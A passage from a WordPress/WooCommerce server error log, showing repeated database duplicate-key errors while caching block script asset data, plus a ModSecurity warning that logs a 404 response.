'{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:49.501949 2026] [lsapi:warn] [pid 823496:tid 823690] [client 45.13.225.123:33116] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386329', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:49.501997 2026] [lsapi:warn] [pid 823496:tid 823690] [client 45.13.225.123:33116] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:49.502548 2026] [security2:error] [pid 823496:tid 823690] [client 45.13.225.123:33116] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "armourin.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahWBmZa08mrtyBNpA4PbwwAAAD4"]
[Tue May 26 16:48:49.517606 2026] [lsapi:warn] [pid 817651:tid 817905] [client 45.13.225.123:33172] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386329', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:49.520007 2026] [lsapi:warn] [pid 817651:tid 817905] [client 45.13.225.123:33172] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-